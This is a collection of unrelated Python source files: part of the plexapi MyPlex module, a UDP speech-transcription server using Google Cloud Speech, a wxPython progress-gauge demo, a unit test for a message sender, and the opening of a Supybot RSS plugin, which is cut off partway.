def podcasts(self):
""" Returns a list of Podcasts Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.PODCASTS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def tidal(self):
""" Returns a list of tidal Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.MUSIC + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
class MyPlexUser(PlexObject):
""" This object represents non-signed in users such as friends and linked
accounts. NOTE: This should not be confused with the :class:`~myplex.MyPlexAccount`
which is your specific account. The raw xml for the data presented here
can be found at: https://plex.tv/api/users/
Attributes:
TAG (str): 'User'
key (str): 'https://plex.tv/api/users/'
allowCameraUpload (bool): True if this user can upload images.
allowChannels (bool): True if this user has access to channels.
allowSync (bool): True if this user can sync.
email (str): User's email address (user@gmail.com).
filterAll (str): Unknown.
filterMovies (str): Unknown.
filterMusic (str): Unknown.
filterPhotos (str): Unknown.
filterTelevision (str): Unknown.
home (bool): Unknown.
id (int): User's Plex account ID.
            protected (bool): Unknown (possibly SSL enabled?).
recommendationsPlaylistId (str): Unknown.
restricted (str): Unknown.
thumb (str): Link to the users avatar.
            title (str): Seems to be an alias for username.
username (str): User's username.
servers: Servers shared between user and friend
"""
TAG = 'User'
key = 'https://plex.tv/api/users/'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.friend = self._initpath == self.key
self.allowCameraUpload = utils.cast(bool, data.attrib.get('allowCameraUpload'))
self.allowChannels = utils.cast(bool, data.attrib.get('allowChannels'))
self.allowSync = utils.cast(bool, data.attrib.get('allowSync'))
self.email = data.attrib.get('email')
self.filterAll = data.attrib.get('filterAll')
self.filterMovies = data.attrib.get('filterMovies')
self.filterMusic = data.attrib.get('filterMusic')
self.filterPhotos = data.attrib.get('filterPhotos')
self.filterTelevision = data.attrib.get('filterTelevision')
self.home = utils.cast(bool, data.attrib.get('home'))
self.id = utils.cast(int, data.attrib.get('id'))
self.protected = utils.cast(bool, data.attrib.get('protected'))
self.recommendationsPlaylistId = data.attrib.get('recommendationsPlaylistId')
self.restricted = data.attrib.get('restricted')
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title', '')
self.username = data.attrib.get('username', '')
self.servers = self.findItems(data, MyPlexServerShare)
for server in self.servers:
server.accountID = self.id
def get_token(self, machineIdentifier):
try:
for item in self._server.query(self._server.FRIENDINVITE.format(machineId=machineIdentifier)):
if utils.cast(int, item.attrib.get('userID')) == self.id:
return item.attrib.get('accessToken')
except Exception:
log.exception('Failed to get access token for %s' % self.title)
def server(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexServerShare` that matches the name specified.
Parameters:
name (str): Name of the server to return.
"""
for server in self.servers:
if name.lower() == server.name.lower():
return server
raise NotFound('Unable to find server %s' % name)
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in all shared servers.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
hist = []
for server in self.servers:
hist.extend(server.history(maxresults=maxresults, mindate=mindate))
return hist
class Section(PlexObject):
""" This refers to a shared section. The raw xml for the data presented here
can be found at: https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}
Attributes:
TAG (str): section
id (int): shared section id
sectionKey (str): what key we use for this section
title (str): Title of the section
sectionId (str): shared section id
type (str): movie, tvshow, artist
shared (bool): If this section is shared with the user
"""
TAG = 'Section'
def _loadData(self, data):
self._data = data
        # self.id = utils.cast(int, data.attrib.get('id'))  # Haven't decided if this should be changed.
self.sectionKey = data.attrib.get('key')
self.title = data.attrib.get('title')
self.sectionId = data.attrib.get('id')
self.type = data.attrib.get('type')
self.shared = utils.cast(bool, data.attrib.get('shared'))
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user for this section in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server._server.resource(self._server.name).connect()
return server.history(maxresults=maxresults, mindate=mindate,
accountID=self._server.accountID, librarySectionID=self.sectionKey)
class MyPlexServerShare(PlexObject):
""" Represents a single user's server reference. Used for library sharing.
Attributes:
id (int): id for this share
serverId (str): what id plex uses for this.
machineIdentifier (str): The servers machineIdentifier
name (str): The servers name
lastSeenAt (datetime): Last connected to the server?
numLibraries (int): Total number of libraries
            allLibraries (bool): True if all libraries are shared with this user.
            owned (bool): True if the server is owned by the user.
pending (bool): True if the invite is pending.
"""
TAG = 'Server'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.id = utils.cast(int, data.attrib.get('id'))
self.accountID = utils.cast(int, data.attrib.get('accountID'))
self.serverId = utils.cast(int, data.attrib.get('serverId'))
self.machineIdentifier = data.attrib.get('machineIdentifier')
self.name = data.attrib.get('name')
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.numLibraries = utils.cast(int, data.attrib.get('numLibraries'))
self.allLibraries = utils.cast(bool, data.attrib.get('allLibraries'))
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.pending = utils.cast(bool, data.attrib.get('pending'))
def section(self, name):
""" Returns the :class:`~plexapi.myplex.Section` that matches the name specified.
Parameters:
name (str): Name of the section to return.
"""
for section in self.sections():
if name.lower() == section.title.lower():
return section
raise NotFound('Unable to find section %s' % name)
def sections(self):
""" Returns a list of all :class:`~plexapi.myplex.Section` objects shared with this user.
"""
url = MyPlexAccount.FRIENDSERVERS.format(machineId=self.machineIdentifier, serverId=self.id)
data = self._server.query(url)
sections = []
for section in data.iter('Section'):
if ElementTree.iselement(section):
sections.append(Section(self, section, url))
return sections
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server.resource(self.name).connect()
return server.history(maxresults=maxresults, mindate=mindate, accountID=self.accountID)
class MyPlexResource(PlexObject):
""" This object represents resources connected to your Plex server that can provide
content such as Plex Media Servers, iPhone or Android clients, etc. The raw xml
for the data presented here can be found at:
https://plex.tv/api/resources?includeHttps=1&includeRelay=1
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
accessToken (str): This resources accesstoken.
clientIdentifier (str): Unique ID for this resource.
connections (list): List of :class:`~myplex.ResourceConnection` objects
for this resource.
createdAt (datetime): Timestamp this resource first connected to your server.
device (str): Best guess on the type of device this is (PS, iPhone, Linux, etc).
home (bool): Unknown
lastSeenAt (datetime): Timestamp this resource last connected.
name (str): Descriptive name of this resource.
owned (bool): True if this resource is one of your own (you logged into it).
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
presence (bool): True if the resource is online
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (str): Version of the product.
provides (str): List of services this resource provides (client, server,
player, pubsub-player, etc.)
synced (bool): Unknown (possibly True if the resource has synced content?)
"""
TAG = 'Device'
key = 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.accessToken = logfilter.add_secret(data.attrib.get('accessToken'))
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.provides = data.attrib.get('provides')
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.synced = utils.cast(bool, data.attrib.get('synced'))
self.presence = utils.cast(bool, data.attrib.get('presence'))
self.connections = self.findItems(data, ResourceConnection)
self.publicAddressMatches = utils.cast(bool, data.attrib.get('publicAddressMatches'))
        # This seems to only be available if it's not your device (e.g. a shared server)
self.httpsRequired = utils.cast(bool, data.attrib.get('httpsRequired'))
self.ownerid = utils.cast(int, data.attrib.get('ownerId', 0))
        self.sourceTitle = data.attrib.get('sourceTitle')  # owner's plex username.
def connect(self, ssl=None, timeout=None):
""" Returns a new :class:`~server.PlexServer` or :class:`~client.PlexClient` object.
Often times there is more than one address specified for a server or client.
This function will prioritize local connections before remote and HTTPS before HTTP.
After trying to connect to all available addresses for this resource and
assuming at least one connection was successful, the PlexServer object is built and returned.
Parameters:
ssl (optional): Set True to only connect to HTTPS connections. Set False to
only connect to HTTP connections. Set None (default) to connect to any
HTTP or HTTPS connection.
Raises:
:class:`plexapi.exceptions.NotFound`: When unable to connect to any addresses for this resource.
"""
# Sort connections from (https, local) to (http, remote)
# Only check non-local connections unless we own the resource
connections = sorted(self.connections, key=lambda c: c.local, reverse=True)
owned_or_unowned_non_local = lambda x: self.owned or (not self.owned and not x.local)
https = [c.uri for c in connections if owned_or_unowned_non_local(c)]
http = [c.httpuri for c in connections if owned_or_unowned_non_local(c)]
cls = PlexServer if 'server' in self.provides else PlexClient
# Force ssl, no ssl, or any (default)
if ssl is True: connections = https
elif ssl is False: connections = http
else: connections = https + http
        # Try connecting to all known resource connections in parallel, but
# only return the first server (in order) that provides a response.
listargs = [[cls, url, self.accessToken, timeout] for url in connections]
log.info('Testing %s resource connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Resource', self.name, results)
class ResourceConnection(PlexObject):
""" Represents a Resource Connection object found within the
:class:`~myplex.MyPlexResource` objects.
Attributes:
TAG (str): 'Connection'
address (str): Local IP address
httpuri (str): Full local address
local (bool): True if local
port (int): 32400
protocol (str): HTTP or HTTPS
uri (str): External address
"""
TAG = 'Connection'
def _loadData(self, data):
self._data = data
self.protocol = data.attrib.get('protocol')
self.address = data.attrib.get('address')
self.port = utils.cast(int, data.attrib.get('port'))
self.uri = data.attrib.get('uri')
self.local = utils.cast(bool, data.attrib.get('local'))
self.httpuri = 'http://%s:%s' % (self.address, self.port)
self.relay = utils.cast(bool, data.attrib.get('relay'))
class MyPlexDevice(PlexObject):
""" This object represents resources connected to your Plex server that provide
playback ability from your Plex Server, iPhone or Android clients, Plex Web,
this API, etc. The raw xml for the data presented here can be found at:
https://plex.tv/devices.xml
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/devices.xml'
clientIdentifier (str): Unique ID for this resource.
connections (list): List of connection URIs for the device.
device (str): Best guess on the type of device this is (Linux, iPad, AFTB, etc).
id (str): MyPlex ID of the device.
model (str): Model of the device (bueller, Linux, x86_64, etc.)
name (str): Hostname of the device.
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (string): Version of the product.
provides (str): List of services this resource provides (client, controller,
sync-target, player, pubsub-player).
publicAddress (str): Public IP address.
screenDensity (str): Unknown
screenResolution (str): Screen resolution (750x1334, 1242x2208, etc.)
token (str): Plex authentication token for the device.
vendor (str): Device vendor (ubuntu, etc).
version (str): Unknown (1, 2, 1.3.3.3148-b38628e, 1.3.15, etc.)
"""
TAG = 'Device'
key = 'https://plex.tv/devices.xml'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.publicAddress = data.attrib.get('publicAddress')
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.model = data.attrib.get('model')
self.vendor = data.attrib.get('vendor')
self.provides = data.attrib.get('provides')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.version = data.attrib.get('version')
self.id = data.attrib.get('id')
self.token = logfilter.add_secret(data.attrib.get('token'))
self.screenResolution = data.attrib.get('screenResolution')
self.screenDensity = data.attrib.get('screenDensity')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.connections = [connection.attrib.get('uri') for connection in data.iter('Connection')]
def connect(self, timeout=None):
""" Returns a new :class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
Sometimes there is more than one address specified for a server or client.
After trying to connect to all available addresses for this client and assuming
at least one connection was successful, the PlexClient object is built and returned.
Raises:
:class:`plexapi.exceptions.NotFound`: When unable to connect to any addresses for this device.
"""
cls = PlexServer if 'server' in self.provides else PlexClient
listargs = [[cls, url, self.token, timeout] for url in self.connections]
log.info('Testing %s device connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Device', self.name, results)
def delete(self):
""" Remove this device from your account. """
key = 'https://plex.tv/devices/%s.xml' % self.id
self._server.query(key, self._server._session.delete)
def syncItems(self):
""" Returns an instance of :class:`plexapi.sync.SyncList` for current device.
Raises:
                :class:`plexapi.exceptions.BadRequest`: when the device doesn't provide `sync-target`.
"""
if 'sync-target' not in self.provides:
            raise BadRequest('Requested syncList for a device which does not provide sync-target')
return self._server.syncItems(client=self)
class MyPlexPinLogin(object):
"""
MyPlex PIN login class which supports getting the four character PIN which the user must
enter on https://plex.tv/link to authenticate the client and provide an access token to
create a :class:`~plexapi.myplex.MyPlexAccount` instance.
This helper class supports a polling, threaded and callback approach.
- The polling approach expects the developer to periodically check if the PIN login was
successful using :func:`plexapi.myplex.MyPlexPinLogin.checkLogin`.
- The threaded approach expects the developer to call
:func:`plexapi.myplex.MyPlexPinLogin.run` and then at a later time call
:func:`plexapi.myplex.MyPlexPinLogin.waitForLogin` to wait for and check the result.
- The callback approach is an extension of the threaded approach and expects the developer
to pass the `callback` parameter to the call to :func:`plexapi.myplex.MyPlexPinLogin.run`.
The callback will be called when the thread waiting for the PIN login to succeed either
finishes or expires. The parameter passed to the callback is the received authentication
token or `None` if the login expired.
Parameters:
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
requestTimeout (int): timeout in seconds on initial connect to plex.tv (default config.TIMEOUT).
Attributes:
PINS (str): 'https://plex.tv/pins.xml'
CHECKPINS (str): 'https://plex.tv/pins/{pinid}.xml'
POLLINTERVAL (int): 1
finished (bool): Whether the pin login has finished or not.
expired (bool): Whether the pin login has expired or not.
token (str): Token retrieved through the pin login.
pin (str): Pin to use for the login on https://plex.tv/link.
"""
PINS = 'https://plex.tv/pins.xml' # get
CHECKPINS = 'https://plex.tv/pins/{pinid}.xml' # get
POLLINTERVAL = 1
def __init__(self, session=None, requestTimeout=None):
super(MyPlexPinLogin, self).__init__()
self._session = session or requests.Session()
self._requestTimeout = requestTimeout or TIMEOUT
self._loginTimeout = None
self._callback = None
self._thread = None
self._abort = False
self._id = None
self.finished = False
self.expired = False
self.token = None
self.pin = self._getPin()
def run(self, callback=None, timeout=None):
""" Starts the thread which monitors the PIN login state.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Raises:
:class:`RuntimeError`: if the thread is already running.
:class:`RuntimeError`: if the PIN login for the current PIN has expired.
"""
if self._thread and not self._abort:
raise RuntimeError('MyPlexPinLogin thread is already running')
if self.expired:
raise RuntimeError('MyPlexPinLogin has expired')
self._loginTimeout = timeout
self._callback = callback
self._abort = False
self.finished = False
self._thread = threading.Thread(target=self._pollLogin, name='plexapi.myplex.MyPlexPinLogin')
self._thread.start()
def waitForLogin(self):
""" Waits for the PIN login to succeed or expire.
Returns:
`True` if the PIN login succeeded or `False` otherwise.
"""
if not self._thread or self._abort:
return False
self._thread.join()
if self.expired or not self.token:
return False
return True
def stop(self):
""" Stops the thread monitoring the PIN login state. """
if not self._thread or self._abort:
return
self._abort = True
self._thread.join()
def checkLogin(self):
""" Returns `True` if the PIN login has succeeded. """
if self._thread:
return False
try:
return self._checkLogin()
except Exception:
self.expired = True
self.finished = True
return False
def _getPin(self):
if self.pin:
return self.pin
url = self.PINS
response = self._query(url, self._session.post)
if not response:
return None
self._id = response.find('id').text
self.pin = response.find('code').text
return self.pin
def _checkLogin(self):
if not self._id:
return False
if self.token:
return True
url = self.CHECKPINS.format(pinid=self._id)
response = self._query(url)
if not response:
return False
token = response.find('auth_token').text
if not token:
return False
self.token = token
self.finished = True
return True
def _pollLogin(self):
try:
start = time.time()
while not self._abort and (not self._loginTimeout or (time.time() - start) < self._loginTimeout):
try:
result = self._checkLogin()
except Exception:
self.expired = True
break
if result:
break
time.sleep(self.POLLINTERVAL)
if self.token and self._callback:
self._callback(self.token)
finally:
self.finished = True
def _query(self, url, method=None):
method = method or self._session.get
log.debug('%s %s', method.__name__.upper(), url)
headers = BASE_HEADERS.copy()
response = method(url, headers=headers, timeout=self._requestTimeout)
if not response.ok: # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def _connect(cls, url, token, timeout, results, i, job_is_done_event=None):
""" Connects to the specified cls with url and token. Stores the connection
information to results[i] in a threadsafe way.
Arguments:
cls: the class which is responsible for establishing connection, basically it's
:class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
url (str): url which should be passed as `baseurl` argument to cls.__init__()
            token (str): authentication token which should be passed as `token` argument to cls.__init__()
            timeout (int): timeout which should be passed as `timeout` argument to cls.__init__()
results (list): pre-filled list for results
i (int): index of current job, should be less than len(results)
            job_is_done_event (:class:`~threading.Event`): if X_PLEX_ENABLE_FAST_CONNECT is True then the
                event will be set as soon as the connection is established
"""
starttime = time.time()
try:
device = cls(baseurl=url, token=token, timeout=timeout)
runtime = int(time.time() - starttime)
results[i] = (url, token, device, runtime)
if X_PLEX_ENABLE_FAST_CONNECT and job_is_done_event:
job_is_done_event.set()
except Exception as err:
runtime = int(time.time() - starttime)
log.error('%s: %s', url, err)
results[i] = (url, token, None, runtime)
def _chooseConnection(ctype, name, results):
""" Chooses the first (best) connection from the given _connect results. """
# At this point we have a list of result tuples containing (url, token, PlexServer, runtime)
# or (url, token, None, runtime) in the case a connection could not be established.
for url, token, result, runtime in results:
okerr = 'OK' if result else 'ERR'
log.info('%s connection %s (%ss): %s?X-Plex-Token=%s', ctype, okerr, runtime, url, token)
results = [r[2] for r in results if r and r[2] is not None]
if results:
log.info('Connecting to %s: %s?X-Plex-Token=%s', ctype, results[0]._baseurl, results[0]._token)
return results[0]
raise NotFound('Unable to connect to %s: %s' % (ctype.lower(), name))
|
thread_asyncio_server.py
|
import asyncio
import zlib
import queue
import threading
import audioop
from google.cloud import speech
from config.config import Config
from config.config import Server
buffer = queue.Queue()
buffer_response = queue.Queue()
def chunks():
while True:
try:
yield buffer.get(timeout = 1)
except queue.Empty:
break
def get_transcription():
while True:
generator = chunks()
client = speech.SpeechClient()
config = speech.types.RecognitionConfig(
encoding=Config.encoding,
language_code=Config.language,
sample_rate_hertz=Config.rate
)
config = speech.types.StreamingRecognitionConfig(config=config, interim_results = True)
requests = (speech.types.StreamingRecognizeRequest(audio_content=chunk) for chunk in generator)
results = client.streaming_recognize(config, requests)
for result in results:
print(result)
for data in result.results:
for parts in data.alternatives:
buffer_response.put(parts.transcript)
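# Note on the loop above: chunks() stops yielding once the queue has been empty
# for a full second, which ends the current streaming_recognize() request; the
# enclosing while True then opens a fresh streaming session as soon as audio
# arrives again. Keeping each session short also matters because Google's
# streaming API caps the duration of a single streaming request.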
def activate_job():
background = threading.Thread(target=get_transcription, args=())
background.daemon = True
background.start()
class EchoServerProtocol(asyncio.DatagramProtocol):
def connection_made(self, transport):
self.transport = transport
def datagram_received(self, data, addr):
message = audioop.adpcm2lin(zlib.decompress(data), 2, None)
buffer.put(message[0])
if buffer_response.empty():
self.transport.sendto(b'', addr)
else:
self.transport.sendto(buffer_response.get().encode(), addr)
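# --- Illustrative client-side sketch (assumption, not part of this server) ----
# datagram_received() above expects every UDP packet to carry zlib-compressed
# ADPCM audio with a 2-byte sample width and no carried-over codec state. A
# matching sender could therefore encode each chunk of 16-bit linear PCM as:
def encode_pcm_chunk(pcm_bytes):
    """Compress one chunk of 16-bit linear PCM into the format the server decodes."""
    adpcm, _state = audioop.lin2adpcm(pcm_bytes, 2, None)  # inverse of adpcm2lin()
    return zlib.compress(adpcm)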
def run_server():
loop = asyncio.get_event_loop()
listen = loop.create_datagram_endpoint(
EchoServerProtocol, local_addr=(Server.host, Server.port))
transport, protocol = loop.run_until_complete(listen)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
transport.close()
loop.close()
if __name__ == '__main__':
activate_job()
run_server()
|
guagetest.py
|
import wx
import time
import threading
class Mywin(wx.Frame):
def __init__(self, parent, title):
super(Mywin, self).__init__(parent, title=title, size=(300, 200))
self.InitUI()
def InitUI(self):
self.thread = threading.Thread(target=self.targetThread)
self.thread.daemon = True
self.count = 0
pnl = wx.Panel(self)
vbox = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
self.gauge = wx.Gauge(pnl, range=20, size=(250, 25), style=wx.GA_HORIZONTAL)
self.btn1 = wx.Button(pnl, label="Start")
self.Bind(wx.EVT_BUTTON, self.OnStart, self.btn1)
hbox1.Add(self.gauge, proportion=1, flag=wx.ALIGN_CENTRE)
hbox2.Add(self.btn1, proportion=1, flag=wx.RIGHT, border=10)
vbox.Add((0, 30))
vbox.Add(hbox1, flag=wx.ALIGN_CENTRE)
vbox.Add((0, 20))
vbox.Add(hbox2, proportion=1, flag=wx.ALIGN_CENTRE)
pnl.SetSizer(vbox)
self.SetSize((300, 200))
self.Centre()
self.Show(True)
def ChangeGauge(self):
self.count = self.count + 1
self.gauge.SetValue(self.count)
def targetThread(self):
while True:
time.sleep(1)
wx.CallAfter(self.ChangeGauge)
if self.count >= 20:
print "end"
return
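# targetThread() runs outside the GUI thread, so it must not touch the gauge
# directly; wx.CallAfter() queues ChangeGauge() to run on the main event-loop
# thread, which is the supported way to update wx widgets from a worker thread.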
def OnStart(self, e):
self.thread.start()
ex = wx.App()
Mywin(None, 'wx.Gauge - www.yiibai.com')
ex.MainLoop()
|
test_sender.py
|
#!/usr/bin/env python
import unittest
import logging
from mock import MagicMock
from multiprocessing import Process, Queue
import os
import random
import sys
import time
sys.path.insert(0, os.path.abspath('..'))
from context import Context
from sender import Sender
class SenderTests(unittest.TestCase):
def test_stop(self):
logging.debug('*** Stop test ***')
mouth = Queue()
context = Context()
sender = Sender(mouth)
sender_process = Process(target=sender.work, args=(context,))
sender_process.daemon = True
sender_process.start()
sender_process.join(1.0)
if sender_process.is_alive():
logging.debug('Stopping sender')
context.set('general.switch', 'off')
sender_process.join()
self.assertFalse(sender_process.is_alive())
self.assertEqual(context.get('sender.counter', 0), 0)
def test_processing(self):
logging.debug('*** Processing test ***')
mouth = Queue()
mouth.put('hello')
mouth.put('world')
mouth.put(Exception('EOQ'))
context = Context()
context.set('spark.CISCO_SPARK_PLUMBERY_BOT', 'garbage')
context.set('spark.room_id', 'fake')
sender = Sender(mouth)
# sender.post_update = MagicMock()
sender.work(context)
with self.assertRaises(Exception):
mouth.get_nowait()
if __name__ == '__main__':
logging.getLogger('').setLevel(logging.DEBUG)
sys.exit(unittest.main())
|
plugin.py
|
###
# Copyright (c) 2002-2004, Jeremiah Fincher
# Copyright (c) 2008-2010, James McCoy
# Copyright (c) 2014, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import re
import os
import sys
import json
import time
import types
import string
import socket
import threading
import feedparser
import supybot.conf as conf
import supybot.utils as utils
import supybot.world as world
from supybot.commands import *
import supybot.utils.minisix as minisix
import supybot.ircmsgs as ircmsgs
import supybot.ircutils as ircutils
import supybot.registry as registry
import supybot.callbacks as callbacks
from supybot.i18n import PluginInternationalization, internationalizeDocstring
_ = PluginInternationalization('RSS')
if world.testing:
INIT_DELAY = 1
else:
INIT_DELAY = 10
if minisix.PY2:
from urllib2 import ProxyHandler
else:
from urllib.request import ProxyHandler
def get_feedName(irc, msg, args, state):
if ircutils.isChannel(args[0]):
state.errorInvalid('feed name', args[0], 'must not be channel names.')
if not registry.isValidRegistryName(args[0]):
state.errorInvalid('feed name', args[0],
'Feed names must not include spaces.')
state.args.append(callbacks.canonicalName(args.pop(0)))
addConverter('feedName', get_feedName)
announced_headlines_filename = \
conf.supybot.directories.data.dirize('RSS_announced.flat')
def only_one_at_once(f):
lock = [False]
def newf(*args, **kwargs):
if lock[0]:
return
lock[0] = True
try:
f(*args, **kwargs)
finally:
lock[0] = False
return newf
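# Usage sketch for the decorator above (hypothetical function, illustration only):
#
#     @only_one_at_once
#     def update_everything():
#         ...  # a second call made while this body is running returns immediately
#
# The guard is a plain closed-over flag rather than a threading.Lock; it is
# applied to update_feeds() below so the per-message threads started in
# __call__() do not run overlapping feed updates.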
class InvalidFeedUrl(ValueError):
pass
class Feed:
__slots__ = ('url', 'name', 'data', 'last_update', 'entries',
'etag', 'modified', 'initial',
'lock', 'announced_entries')
def __init__(self, name, url, initial,
plugin_is_loading=False, announced=None):
assert name, name
if not url:
if not utils.web.httpUrlRe.match(name):
raise InvalidFeedUrl(name)
url = name
self.name = name
self.url = url
self.initial = initial
self.data = None
# We don't want to fetch feeds right after the plugin is
# loaded (the bot could be starting, and thus already busy)
self.last_update = 0
self.entries = []
self.etag = None
self.modified = None
self.lock = threading.Lock()
self.announced_entries = announced or \
utils.structures.TruncatableSet()
def __repr__(self):
return 'Feed(%r, %r, %r, <bool>, %r)' % \
(self.name, self.url, self.initial, self.announced_entries)
def get_command(self, plugin):
docstring = format(_("""[<number of headlines>]
Reports the titles for %s at the RSS feed %u. If
<number of headlines> is given, returns only that many headlines.
RSS feeds are only looked up every supybot.plugins.RSS.waitPeriod
seconds, which defaults to 1800 (30 minutes) since that's what most
websites prefer."""), self.name, self.url)
def f(self2, irc, msg, args):
args.insert(0, self.name)
self2.rss(irc, msg, args)
f = utils.python.changeFunctionName(f, self.name, docstring)
f = types.MethodType(f, plugin)
return f
_sort_parameters = {
'oldestFirst': (('published_parsed', 'updated_parsed'), False),
'newestFirst': (('published_parsed', 'updated_parsed'), True),
'outdatedFirst': (('updated_parsed', 'published_parsed'), False),
'updatedFirst': (('updated_parsed', 'published_parsed'), True),
}
def _sort_arguments(order):
(fields, reverse) = _sort_parameters[order]
def key(entry):
for field in fields:
if field in entry:
return entry[field]
raise KeyError('No date field in entry.')
return (key, reverse)
def sort_feed_items(items, order):
"""Return feed items, sorted according to sortFeedItems."""
if order == 'asInFeed':
return items
(key, reverse) = _sort_arguments(order)
try:
sitems = sorted(items, key=key, reverse=reverse)
except KeyError:
# feedparser normalizes required timestamp fields in ATOM and RSS
# to the "published"/"updated" fields. Feeds missing it are unsortable by date.
return items
return sitems
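# Illustrative example (assumed data): sort_feed_items() orders entries by the
# first timestamp field present and silently falls back to feed order when a
# feed provides no dates at all.
#
#     entries = [{'published_parsed': (2020, 1, 2, 0, 0, 0, 0, 2, 0)},
#                {'published_parsed': (2020, 1, 1, 0, 0, 0, 0, 1, 0)}]
#     sort_feed_items(entries, 'newestFirst')   # 2020-01-02 entry first
#     sort_feed_items(entries, 'asInFeed')      # returned unchanged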
def load_announces_db(fd):
return dict((name, utils.structures.TruncatableSet(entries))
for (name, entries) in json.load(fd).items())
def save_announces_db(db, fd):
json.dump(dict((name, list(entries)) for (name, entries) in db), fd)
class RSS(callbacks.Plugin):
"""This plugin is useful both for announcing updates to RSS feeds in a
channel, and for retrieving the headlines of RSS feeds via command. Use
the "add" command to add feeds to this plugin, and use the "announce"
command to determine what feeds should be announced in a given channel."""
threaded = True
def __init__(self, irc):
self.__parent = super(RSS, self)
self.__parent.__init__(irc)
if world.starting:
self._init_time = time.time() # To delay loading the feeds
else:
self._init_time = 0
# Scheme: {name: url}
self.feed_names = callbacks.CanonicalNameDict()
# Scheme: {url: feed}
self.feeds = {}
if os.path.isfile(announced_headlines_filename):
with open(announced_headlines_filename) as fd:
announced = load_announces_db(fd)
else:
announced = {}
for name in self.registryValue('feeds'):
self.assert_feed_does_not_exist(name)
self.register_feed_config(name)
try:
url = self.registryValue(registry.join(['feeds', name]))
except registry.NonExistentRegistryEntry:
self.log.warning('%s is not a registered feed, removing.',name)
continue
try:
